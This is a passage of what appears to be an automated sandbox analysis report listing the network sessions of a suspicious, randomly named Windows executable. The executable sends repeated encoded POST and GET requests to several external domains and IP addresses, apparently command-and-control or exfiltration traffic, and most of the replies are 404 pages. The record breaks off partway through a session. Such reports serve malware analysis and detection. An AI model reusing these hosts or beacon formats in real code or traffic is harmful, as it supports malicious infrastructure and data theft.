User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Data Ascii: -0-L9xY=tg9D6RRhq9MTzG0kwqQDt9Gdu8PrusDLQAbm/sIPJEnXT31N8EPrk+vT4JOmHwfHcIXv8l6DE/8gjSnM4Dy1jlCCS/mwhc/pKLSHnBZVQDwWt84uWNunp/+MsqIt07twDZoHtnKXcTqfoe5z09C6eGSXnD+Um5nh+xv1aSnjW4ve6CapyX64ECmYDqaLjiPrmA2nbHud87x6
Jan 10, 2025 09:11:26.645780087 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 08:11:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L70RIiBmOYfKGjaYeipFVbIyeXCyhl779EQGsO0G9bSmUGHUZDh29N%2B%2BHvBInc%2FjkLxZohVOuZDcG4lOOjnZuit0oaiVPh9hWeBtF4cxOfsYeQSY6vrgD1yV7skN%2FRGEWDD4%2B9miRAo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffb323efcdb4321-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1546&rtt_var=773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49989 | 188.114.96.3 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:11:28.078591108 CET | 814 | OUT | POST /pgw3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.einpisalpace.shop
Origin: http://www.einpisalpace.shop
Referer: http://www.einpisalpace.shop/pgw3/
Cache-Control: no-cache
Content-Length: 236
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Data Ascii: -0-L9xY=tg9D6RRhq9MTylskyMYDrdGcyMPrnMDPQAHm/pwhI2DXTSZN9FPrl+vTzpOvJQfIcIrR8lGDE7UgjSXM40u2i1CAefmy8s/pKLSHnBM4QDYWsNIuMsuojf+LmKIt/bt0DZoftlvKcRifochz0o25UGSRoj/QnoaImiz3RknTLIr/70Hzuk6bWSGaDoC5jCPBkAOnJQi6zPUZ3eOVlPZSGBB8NrPlkYsQXQ==
Jan 10, 2025 09:11:29.180578947 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 08:11:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJ7hrss%2Byexp%2F9EiCU0U0gYQ9GK24OY0%2BT12nZrkiH3Pi8ciGA%2BBYiE7t0lucV1JPKFAwL8qjyTAnDs37DA1TsvfDhcuZ%2ByWTFyKuo7cK7c65OMGzgW7dVz%2BF%2FXk9pwbACWHZzX5w8k%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffb324eeb0242c9-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=814&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49990 | 188.114.96.3 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:11:30.627504110 CET | 1827 | OUT | POST /pgw3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.einpisalpace.shop
Origin: http://www.einpisalpace.shop
Referer: http://www.einpisalpace.shop/pgw3/
Cache-Control: no-cache
Content-Length: 1248
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Data Ascii: -0-L9xY=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 [TRUNCATED]
Jan 10, 2025 09:11:31.729211092 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Fri, 10 Jan 2025 08:11:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65oyZ4DP%2BC0JwGm3OPngz5mLyZxKGMdEViDQA%2FFgTe2qEW7ZtlLBaYPqZct0PZYea3WmCjQxMf7UVgKPeqFhVGMcxcCUKdGZVRH1m9uazUNIqQoITAkKkfIkHX%2BVv5E%2BSE67eLwsj8E%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffb325ecd3c8c30-EWR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2019&rtt_var=1009&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1827&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c [TRUNCATED]
                                                                    Data Ascii: 2cfTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                                                                    Jan 10, 2025 09:11:31.729276896 CET | 384 | IN | Data Raw: d7 09 d4 dc 96 52 c5 70 3e 36 3b 18 fb ef 98 60 02 0f 3d 1e 4e 97 57 2f 17 2f 96 4f 73 80 21 89 83 08 4c 3a 91 ce b0 45 59 0a 8a e1 4e 57 45 02 15 12 a1 0d 9d e1 b9 54 65 0c 61 e4 81 8f f2 e1 b4 93 9f ce cc ee 48 df c0 c3 56 16 24 e2 69 4f fb 75
                                                                    Data Ascii: Rp>6;`=NW//Os!L:EYNWETeaHV$iOuAXb!iwGiyP(dK4<x8'F:IXs"t;uw&K9$TF:^mX}eKRfK +dsWv@~fZ-ZT%<P


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.6 | 49991 | 188.114.96.3 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:11:33.168490887 CET | 524 | OUT | GET /pgw3/?Mn=PdO8wZnxGnZX&-0-L9xY=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.einpisalpace.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:11:34.316623926 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:11:34 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2dPqzR%2Fzpay%2BDAh0BItakTeQ8UGqi0Riu2ePbol0IB55lUBW%2FkdOdbgs%2FZDJS57O9%2FMlvINr%2FTv6P5sQjRwFBTuJAn33DBVS%2FljzLri96qesvFbh8tY7DP7ZM0cvj3YX%2FJgFH9MXV4%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ffb326ece0541cd-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=524&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Raw: 35 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                    Data Ascii: 592<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type
                                                                    Jan 10, 2025 09:11:34.316644907 CET | 1057 | IN | Data Raw: 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d
                                                                    Data Ascii: ="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bol


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.6 | 49992 | 47.83.1.90 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:11:39.365300894 CET | 772 | OUT | POST /hf4a/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.ripbgs.info
                                                                    Origin: http://www.ripbgs.info
                                                                    Referer: http://www.ripbgs.info/hf4a/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 34 7a 6a 53 56 43 42 58 4e 42 69 42 4d 55 4b 36 6b 49 55 72 6e 72 44 74 31 72 49 67 46 58 67 54 6b 6d 42 76 68 54 50 33 57 6c 2f 34 59 4c 46 31 34 64 78 79 46 59 48 6e 78 48 44 47 70 57 41 74 44 61 44 74 36 45 4e 63 6a 47 4a 46 66 63 45 39 5a 45 46 75 70 5a 78 6c 55 6f 2f 41 36 38 6c 49 70 74 4d 53 34 6d 49 74 48 71 34 46 63 54 38 33 59 6e 72 78 71 67 4a 72 67 6c 64 49 48 31 79 59 70 35 4a 73 78 33 59 46 6d 56 33 7a 41 75 36 49 76 76 65 67 52 47 56 35 5a 4b 58 4c 74 66 61 57 78 46 64 41 47 72 78 2f 69 44 6f 6a 47 34 52 49 2f 6e 4b 75 31 49 51 4d 42 71 4e 37 4e 45 2b 6b 2b 59 31 31 4d 46 50 6e 6b 43 62 65
                                                                    Data Ascii: -0-L9xY=4zjSVCBXNBiBMUK6kIUrnrDt1rIgFXgTkmBvhTP3Wl/4YLF14dxyFYHnxHDGpWAtDaDt6ENcjGJFfcE9ZEFupZxlUo/A68lIptMS4mItHq4FcT83YnrxqgJrgldIH1yYp5Jsx3YFmV3zAu6IvvegRGV5ZKXLtfaWxFdAGrx/iDojG4RI/nKu1IQMBqN7NE+k+Y11MFPnkCbe


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.6 | 49993 | 47.83.1.90 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:11:41.907010078 CET | 796 | OUT | POST /hf4a/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.ripbgs.info
                                                                    Origin: http://www.ripbgs.info
                                                                    Referer: http://www.ripbgs.info/hf4a/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 34 7a 6a 53 56 43 42 58 4e 42 69 42 4e 30 61 36 6d 72 38 72 68 4c 44 75 73 4c 49 67 4c 33 68 61 6b 6d 4e 76 68 58 33 42 56 58 62 34 59 71 31 31 35 63 78 79 45 59 48 6e 70 58 44 44 6e 32 41 69 44 62 2b 59 36 42 4e 63 6a 48 74 46 66 59 49 39 5a 33 74 76 6f 4a 78 6e 59 49 2f 43 6e 73 6c 49 70 74 4d 53 34 6d 63 44 48 71 51 46 63 6a 4d 33 58 6d 72 32 32 77 4a 30 68 6c 64 49 52 31 79 63 70 35 4a 61 78 7a 35 53 6d 58 50 7a 41 72 2b 49 75 39 6d 6a 62 47 56 2f 45 61 57 34 6c 50 62 54 2b 47 6f 73 5a 62 42 6f 7a 69 67 38 4b 75 4d 53 6a 55 4b 4e 6e 59 77 4f 42 6f 56 4a 4e 6b 2b 4f 38 59 4e 31 65 53 44 41 72 32 2b 39 58 70 36 72 71 46 6b 37 66 71 53 50 7a 4b 4d 45 38 48 4f 4f 53 41 3d 3d
                                                                    Data Ascii: -0-L9xY=4zjSVCBXNBiBN0a6mr8rhLDusLIgL3hakmNvhX3BVXb4Yq115cxyEYHnpXDDn2AiDb+Y6BNcjHtFfYI9Z3tvoJxnYI/CnslIptMS4mcDHqQFcjM3Xmr22wJ0hldIR1ycp5Jaxz5SmXPzAr+Iu9mjbGV/EaW4lPbT+GosZbBozig8KuMSjUKNnYwOBoVJNk+O8YN1eSDAr2+9Xp6rqFk7fqSPzKME8HOOSA==


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.6 | 49994 | 47.83.1.90 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:11:44.451373100 CET | 1809 | OUT | POST /hf4a/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.ripbgs.info
                                                                    Origin: http://www.ripbgs.info
                                                                    Referer: http://www.ripbgs.info/hf4a/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 34 7a 6a 53 56 43 42 58 4e 42 69 42 4e 30 61 36 6d 72 38 72 68 4c 44 75 73 4c 49 67 4c 33 68 61 6b 6d 4e 76 68 58 33 42 56 58 54 34 59 38 68 31 34 2f 4a 79 48 59 48 6e 33 48 44 43 6e 32 41 46 44 62 6d 63 36 42 78 71 6a 45 46 46 66 37 41 39 4a 47 74 76 6d 35 78 6e 48 34 2f 44 36 38 6b 43 70 70 6f 57 34 6d 4d 44 48 71 51 46 63 6c 41 33 65 58 72 32 30 77 4a 72 67 6c 64 36 48 31 79 6b 70 34 67 76 78 31 6b 76 6e 6e 76 7a 44 4c 4f 49 73 4f 65 6a 5a 6d 56 39 48 61 57 67 6c 50 58 59 2b 47 6b 65 5a 5a 68 43 7a 67 38 38 4a 4b 39 49 6e 32 66 54 7a 2b 59 50 56 36 59 70 4a 7a 6d 39 38 4b 64 6f 54 41 4c 66 74 6b 4f 6d 59 64 7a 6f 71 48 74 65 53 49 6d 63 78 75 78 4d 35 55 69 45 4a 4b 6d 65 50 6b 42 45 32 7a 44 51 46 69 75 34 79 67 58 39 4a 69 34 74 34 6a 64 5a 32 73 65 49 44 4f 2f 65 30 71 54 74 36 48 37 69 68 6d 44 74 78 42 59 72 46 78 37 66 47 54 47 56 2b 6a 67 4a 41 45 74 32 59 64 44 2f 68 37 49 33 47 51 68 63 39 43 32 46 70 6c 72 75 73 66 45 2f 57 39 77 41 49 35 69 4c 30 41 2b 55 57 61 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=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 [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.2.6 | 49995 | 47.83.1.90 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:11:46.996006966 CET | 518 | OUT | GET /hf4a/?-0-L9xY=1xLyW3NuagjZMWLakpM9q9Dlq5M4Mwlw3Xlkp07XGkfoNpNQ7ONbaOfooFbWkXkUauDqyi9rr3xWBLUVS1AbncpoQpr6kYxUu+wU3Tx1ZPQnZRQ2cE7e7gBiti52HSebvZ5SsDs=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.ripbgs.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:11:48.624751091 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                    Server: nginx/1.18.0
                                                                    Date: Fri, 10 Jan 2025 08:11:48 GMT
                                                                    Content-Length: 17
                                                                    Connection: close
                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                    Data Ascii: Request too large


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    13 | 192.168.2.6 | 49997 | 162.0.236.169 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 10, 2025 09:12:10.583653927 CET | 790 | OUT | POST /t0rn/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.explorevision.xyz
                                                                    Origin: http://www.explorevision.xyz
                                                                    Referer: http://www.explorevision.xyz/t0rn/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 56 66 57 44 42 69 76 6c 73 70 52 73 78 69 74 66 4b 33 77 6f 6b 55 72 35 54 62 4a 73 41 48 6b 4b 56 38 45 42 47 49 4e 7a 71 66 44 34 6e 58 68 78 6d 4f 7a 58 37 6e 74 58 4b 44 57 59 50 36 78 2b 4e 46 62 34 4f 30 39 68 68 54 33 46 72 4d 66 2b 33 4f 41 6c 55 52 52 42 6d 2f 70 52 68 54 2f 5a 2f 44 37 6a 4a 4f 68 50 4b 6e 64 50 48 75 31 43 55 54 59 37 38 2b 54 57 61 42 5a 46 41 72 32 57 4d 53 36 4b 44 39 4c 51 77 51 52 34 49 38 4d 30 4f 78 58 6f 47 48 6b 4d 42 50 38 56 6f 48 48 69 45 78 77 63 64 55 31 4e 71 53 57 53 69 55 71 33 63 74 78 54 76 64 47 2f 4b 39 62 67 6f 39 4a 4a 34 4a 77 45 36 6a 4b 4b 39 72 63 52
                                                                    Data Ascii: -0-L9xY=VfWDBivlspRsxitfK3wokUr5TbJsAHkKV8EBGINzqfD4nXhxmOzX7ntXKDWYP6x+NFb4O09hhT3FrMf+3OAlURRBm/pRhT/Z/D7jJOhPKndPHu1CUTY78+TWaBZFAr2WMS6KD9LQwQR4I8M0OxXoGHkMBP8VoHHiExwcdU1NqSWSiUq3ctxTvdG/K9bgo9JJ4JwE6jKK9rcR
                                                                    Jan 10, 2025 09:12:11.142097950 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:12:11 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    14 | 192.168.2.6 | 49998 | 162.0.236.169 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
